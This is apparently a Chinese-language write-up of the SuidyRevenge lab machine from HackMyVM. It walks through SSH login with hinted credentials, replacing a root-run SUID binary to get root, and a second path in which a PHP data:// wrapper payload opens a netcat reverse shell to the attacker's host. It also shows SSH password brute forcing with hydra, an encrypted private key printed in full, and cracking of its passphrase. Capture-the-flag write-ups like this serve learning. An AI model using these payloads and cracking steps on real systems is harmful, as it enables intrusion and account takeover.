HMV-SuidyRevenge靶机复盘

端口扫描

┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.58.83            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 21:22 CST
Nmap scan report for bogon (192.168.58.83)
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: F2:89:91:6B:3E:9D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

常规的端口，直接去web里面看看。

web探测1

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.83             
Im proud to announce that "theuser" is not anymore in our servers.
Our admin "mudra" is the best admin of the world.
-suidy

<!--

"mudra" is not the best admin, IM IN!!!!
He only changed my password to a different but I had time
to put 2 backdoors (.php) from my KALI into /supersecure to keep the access!

-theuser

-->

这里给出了很多用户名，而且给出了一个类似于用户凭据的东西theuser/different 我先试试

┌──(root㉿kakeru)-[~/tmp]
└─# ssh theuser@192.168.58.83
The authenticity of host '192.168.58.83 (192.168.58.83)' can't be established.
ED25519 key fingerprint is SHA256:C2ARiZ0bIPPaLPinl6orW4V74Oo6OBUH2j0JSGrwcu8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.83' (ED25519) to the list of known hosts.
theuser@192.168.58.83's password: 
Linux suidyrevenge 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct  2 09:19:02 2020 from 192.168.1.58
theuser@suidyrevenge:~$ id
uid=1004(theuser) gid=1004(theuser) groups=1004(theuser)

发现真的可以登录

提权1

即然登录进来那就看看有没有什么东西吧
没有sudo，有suid

theuser@suidyrevenge:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for theuser: 
Sorry, user theuser may not run sudo on suidyrevenge.
theuser@suidyrevenge:~$ find / -user root -perm -4000 -print 2>/dev/null
/home/suidy/suidyyyyy
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/mount
/usr/bin/violent
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/passwd

这里在suidy用户目录下面有一个suid文件

theuser@suidyrevenge:/home/suidy$ ls -al
total 52
drwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .
drwxr-xr-x 8 root  root     4096 Oct  1  2020 ..
-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history
-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout
-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc
drwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local
-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt
-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile
-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy
theuser@suidyrevenge:/home/suidy$ file suidyyyyy 
suidyyyyy: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=863d91411490dee69e751d36cbdc3b45b593f459, not stripped
theuser@suidyrevenge:/home/suidy$ ./suidyyyyy 
suidy@suidyrevenge:/home/suidy$ id
uid=1005(suidy) gid=1004(theuser) groups=1004(theuser)

这是一个可执行文件,执行之后发现拿到suidy的用户了。把这个文件拿到本地看看是做了什么事

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > suidy
                           
suidy@suidyrevenge:/home/suidy$ cat suidyyyyy  > /dev/tcp/192.168.58.11/1234

在ida里面看，发现就是一个设置suid然后拿到shell的程序

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0x3EDu);
  setgid(0x3EDu);
  system("/bin/bash");
  return 0;
}

这个suidy目录下面还有一个note

suidy@suidyrevenge:/home/suidy$ ls
note.txt  suidyyyyy
suidy@suidyrevenge:/home/suidy$ cat note.txt
I know that theuser is not here anymore but suidyyyyy is now more secure!
root runs the script as in the past that always gives SUID to suidyyyyy binary
but this time also check the size of the file.
WE DONT WANT MORE "theuser" HERE!.
WE ARE SECURE NOW.

-suidy

这里说suidyyyyy总是有suid权限，还说道了检查file的size
那根据这个提示，肯定就是要对这个有suid的程序做手脚了，而且这个程序还是属于theuser组，有rws权限
因为这个文件的属组是theuser，我就先用了theuser用户写一个c文件，但是这个文件的目录是suidy的，theuser没有写入权限
那现在我也写一个得到bash的文件，设置uid和gid是0

suidy@suidyrevenge:/home/suidy$ ls -al
total 76
drwxrwxr-x 3 suidy suidy    4096 Mar  4 08:54 .
drwxr-xr-x 8 root  root     4096 Oct  1  2020 ..
-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history
-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout
-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc
-rwxr-xr-x 1 suidy theuser 16712 Mar  4 08:54 hack
-rw-r--r-- 1 suidy theuser    97 Mar  4 08:54 hack.c
drwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local
-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt
-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile
-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy
suidy@suidyrevenge:/home/suidy$ cat hack.c
#include <stdio.h>


int main(){
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

刚才提示我们说大小，发现这个大小也是刚好一样的，看来就没有什么问题
但是这里我用cp命令，发现说这个suidyyyyy busy，是因为我们这个bash就是运行这个程序得到的，那我们又不知道suidy的密码，所以就直接删除这个文件吧
过了一会发现这个suidyyyyy程序又出现了，估计就是一个定时任务

theuser@suidyrevenge:/home/suidy$ ls
hack  hack.c  note.txt  suidyyyyy
theuser@suidyrevenge:/home/suidy$ cp /home/suidy/hack /home/suidy/suidyyyyy 
theuser@suidyrevenge:/home/suidy$ ./suidyyyyy 

theuser@suidyrevenge:/home/suidy$ ./suidyyyyy 
root@suidyrevenge:/home/suidy# id
uid=0(root) gid=0(root) groups=0(root),1004(theuser)

发现成功了，但是为什么这个是个hard靶机呢。这样下来一看也就是个easy。翻了一下wp，发现原来这里web有第二种方式拿到www用户然后提权

web2

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.83
Im proud to announce that "theuser" is not anymore in our servers.
Our admin "mudra" is the best admin of the world.
-suidy

<!--

"mudra" is not the best admin, IM IN!!!!
He only changed my password to a different but I had time
to put 2 backdoors (.php) from my KALI into /supersecure to keep the access!

-theuser

-->

根据这里的提示信息，theuser放了两个后门php文件在/supersecure，这里在本机上面先看看这些文件是什么名字

┌──(root㉿kakeru)-[~/tmp]
└─# ls /usr/share/webshells/php 
findsocket  php-backdoor.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php

最后发现这个simple-backdoor.php是可以用的，使用方式就是?cmd的任意命令执行
发现这个目录下面有两个的后门分别是

但是在这里反弹shell没有成功

那就尝试另外一个后门文件

这个后门文件是用来读取文件，所以就想到用php伪协议执行命令
拿到www的shell

http://192.168.58.83/supersecure/mysuperbackdoor.php?file=data://text/plain,%3C?php%20system(%22nc%20-e%20/bin/bash%20192.168.58.11%201234%22);
┌──(root㉿kakeru)-[/usr/share/webshells/php]
└─# nc -lp 1234        
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权2

www-data@suidyrevenge:~/html$ ls
index.html  murdanote.txt  supersecure
www-data@suidyrevenge:~/html$ cat murdanote.txt 
I always lost my password so Im using 
one password from rockyou.txt !

-murda

找到一个murda提示文件，提示我们要用rockyou字典爆破密码

┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l murda -P rockyou.txt ssh://192.168.58.83
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-04 22:36:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.58.83:22/
[22][ssh] host: 192.168.58.83   login: murda   password: iloveyou
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-04 22:37:00

登录到murda 有一个secret.txt文件

murda@suidyrevenge:~$ ls
secret.txt
murda@suidyrevenge:~$ cat secret.txt 
I know that theuser is here!
I just got the id_rsa from "violent".
I will put the key in a secure place for theuser!
I hope he find it.
Remember that rockyou.txt is your friend!

根据提示找到这个id_rsa

murda@suidyrevenge:~$ find / -name "id_rsa" -print 2>/dev/null
/usr/games/id_rsa
murda@suidyrevenge:~$ cat /usr/games/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDGbexiJO
b7KaTASSyt9yKFAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC/9FkJSQol
CNgAMG4SeDpKctz5/h6ylTx0vT73OzMwYO97HL/tRrfL0gOWV2UNTuOFwg5fBorYZfBgql
bVzsIuCitxvoButf59aeoZtLxeUUuUm3G7Q06IvLV2vj+VgJ2i2tUjXboCcQ0Yv+Bj9JBC
+/6fG9j+ED7Pi42zjm9zNQsPhrwviHptksnKwpsV5KhBNuO3heeZvydX/sudsCCrYXBKoe
P8abXDqJYXhjskJupu8Rb0bcLxR1uEIGgsRww7waBaiag65WnXBwTrzjriWFdCJcI2lfdc
l7g/b6T5UfxFSzmdNEZvaH/SNvPEpE8bAUW9rcJwwEJZyIrc4z5VAAAD0PmVBELTPOuptO
2LGbENxSNYTLn6TqacFrj76WfTo7Q81QdCw9IJ0ruu0ivvtQWAS2CmG7Hq7vE8b+T6KI8w
sRJkfpON5nr5e+mfCGD7Gt0WVBaZ1SolbN17XoSNyTNq8jqF9EcwnsqIM8SRWrLERufCCs
SMDJlGb2/khum3fgDvI1R7gm0KYQRRJu33qx9ZXHRmCGKvEMV/pSaIJb2JBTQ9N/QcMlVK
RGsVC/NNhwcWSMQh6DGLmcC+yZvo5lxBnNUibWKNtf2zTx6yep6SwVzvt9Qg5aZ1exIEYa
9bmpZCzHVpHHK859U1l0FNJoBFrCiC0CssPv4E+g1iLA47NXYCeQxpWvZPsqXwr+J46vR9
UC+pZHy9bOHc0J+CTP80vEazyMN0Uko9/R2iJ+7GeQgtzoVBt7mqjaoIDljXOQ6YD5F7a8
5LvfFgW691eKdoZbGjaALMdV629MHdm6t5KL56YO9bbWlpgvo61iYqrAE2t+jhlUoQeQ+9
cH8fKHVXctRCypsx577qTwnUFtLn+l3f+Twl1ulxpV/bs497n1a1aDNpAoMJYt0601+3H8
qJQQ12QiBEi1CTvt+W2/d1EQeZ+MDUSqFCLDGE34xu6lI+/Wjmv03qBSRvdUK91MX1Lb2n
uUZN0OH6pJbmj3oxHSB6ADFetH7bVFXKC4VjTGltoRWD3sH2n5UIcVZZ+1qha3n37U8Q1/
OVwSqtTE6NbYQsnsydv9plM1xLkacY9+db35wPBQSVkuiTuENKUbDMIFC8GiFTzshG9Owr
8LvdK+LSxCrjQcAch7AYFma7IEtkJDHHAC2dwHw+ojqb510c9d5oBAd/vboElE9ZjYbOq2
WT9UdY26/LOQ1LZVZ9LU3hW+N9zRLgJZz6jfvELGlS2jxNjBVW8+0dGHOBFxu+lHjyZCaA
YaUwJvd2lTkoLIH3o7Wog7c69tTtVP39Lx2trFCRtWs0eJIP6bGMsB83nwWzxiRnUKX5/3
anvv/RtCRJoEsSX9vtXJpMnE4ZXO4H7LglGWe/dlIRkF/Pm81FPB+kiuAYbe+CRVIvEC+m
dkCybp6++R/Td2GQ/uh3Iz3Q6CbmGEpnjAtUBjizQc4vrPpB0tgsEXpzB5ZAj10IjgK6a+
2PIaEbU2nsSic6JT1tN8GOAx3kca+x94PZ9quSvGxBIjCcre5IC1vDPSl9ltPIZwwvDIbN
ORebGQ41OO++boyqMUAeWPCp0U16acJ7l/copQQcuIZ0mTched3eyetddQ5FMCHv2EbvK5
ovZ9EUC8ryJgnq1/+ECUOutT5q49Q=
-----END OPENSSH PRIVATE KEY-----

直接用这个私钥登录提示要passphrase ，所以先用john破解一下

┌──(root㉿kakeru)-[~/tmp]
└─# ssh2john id_rsa > hash                               
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# john --wordlist=./rockyou.txt hash                     
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateu           (id_rsa)     
1g 0:00:00:42 DONE (2025-03-04 23:01) 0.02329g/s 29.07p/s 29.07c/s 29.07C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

找到violent的密码是ihateu

violent@suidyrevenge:~$ find / -user violent -print 2>/dev/null | grep -ivE "sys|run|proc"
/home/violent
/home/violent/.bashrc
/home/violent/.bash_logout
/home/violent/.ssh
/home/violent/.ssh/id_rsa
/home/violent/.ssh/authorized_keys
/home/violent/.ssh/id_rsa.pub
/home/violent/.bash_history
/home/violent/.profile
/dev/pts/

找了一下这个用户也没有有用的信息，所以最后还是要回到theuser用户，然后得到suidy用户的权限

总结

这个靶机好奇怪，设置了这么多误导项，但是一开始就可以登录theuser用户，感觉完全也没必要，然后后面应该提权部分也有点bug
我猜是对文件大小有判断的，但是我稍微写下设置uid的c文件大小就一样了。。